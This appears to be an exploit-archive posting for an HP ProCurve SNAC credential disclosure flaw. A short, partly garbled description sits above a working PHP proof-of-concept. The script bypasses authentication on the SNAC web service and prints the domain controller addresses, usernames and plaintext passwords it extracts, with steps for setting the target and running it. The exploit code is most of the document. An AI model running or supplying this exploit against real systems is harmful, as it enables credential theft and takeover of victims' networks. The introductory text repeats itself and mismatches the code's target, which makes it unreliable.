HP ProCurve 4.00 Credential Disclosure

The HP ProCurve 4.00 Credential Disclosure was a vulnerability affecting The HP ProCurve 4.00 Credential Disclosure was a vulnerability affecting HP ProCurve switches running firmware version 4.00. This flaw allowed unauthorized individuals to access and retrieve sensitive authentication credentials, such as passwords or SNMP community strings.

The disclosure typically occurred by accessing specific configuration files or interfaces, which presented the credentials in plain text or an easily recoverable format. Exploitation could lead to unauthorized control over the switch, network compromise, and further security breaches.

Mitigation involved upgrading to a patched firmware version, enforcing strong password policies, and securing access to management interfaces to prevent exploitation.

=============================================================================================================================================
| # Title : HP ProCurve 4.00 Credential Dumping Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Performing a Credential Dumping attack against vulnerable HP ProCurve SNAC systems.

Bypass Authentication in HP ProCurve SNAC to Extract Domain Controller Data

(Related : https://packetstorm.news/files/id/180690/ Linked CVE numbers: ) .

[+] save code as poc.php.

[+] Set target : line 86

[+] PayLoad :

<?php

class HPSNACExploit {
private $target;
private $port;

public function __construct($target, $port = 443) {
$this->target = $target;
$this->port = $port;
}

private function sendRequest($url, $cookies = "") {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}{$url}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if (!empty($cookies)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookies"]);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function getSession() {
$response = $this->sendRequest("/RegWeb/html/snac/index.html");
preg_match_all('/Set-Cookie: (.*?);/i', $response, $matches);
return isset($matches[1]) ? implode("; ", $matches[1]) : null;
}

public function getDomainInfo($session) {
$response = $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", $session);
return (strpos($response, 'domainName') !== false) ? $response : null;
}

public function parseDomainData($xmlData) {
$credentials = [];
$xml = simplexml_load_string($xmlData);
if ($xml && isset($xml->Controllers->Domain)) {
foreach ($xml->Controllers->Domain as $domain) {
$credentials[] = [
'ip' => (string) $domain->domainControllerIP,
'port' => (string) $domain->port,
'service' => (string) $domain->connType,
'user' => (string) $domain->userName,
'password' => (string) $domain->password
];
}
}
return $credentials;
}

public function exploit() {
echo "[*] Trying to get session...\n";
$session = $this->getSession();
if (!$session) {
echo "[-] Failed to obtain session. Target may not be vulnerable.\n";
return;
}

echo "[*] Exploiting authentication bypass...\n";
$domainInfo = $this->getDomainInfo($session);
if (!$domainInfo) {
echo "[-] Exploit failed. Target may not be vulnerable.\n";
return;
}

echo "[*] Parsing extracted data...\n";
$credentials = $this->parseDomainData($domainInfo);
if (empty($credentials)) {
echo "[!] No domain controllers found.\n";
return;
}

echo "[+] Credentials found:\n";
foreach ($credentials as $cred) {
echo "Domain Controller: {$cred['ip']}:{$cred['port']} ({$cred['service']})\n";
echo "Username: {$cred['user']}\n";
echo "Password: {$cred['password']}\n";
echo "-----------------------------------------\n";
}
}
}

$exploit = new HPSNACExploit("target.com");
$exploit->exploit();

?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================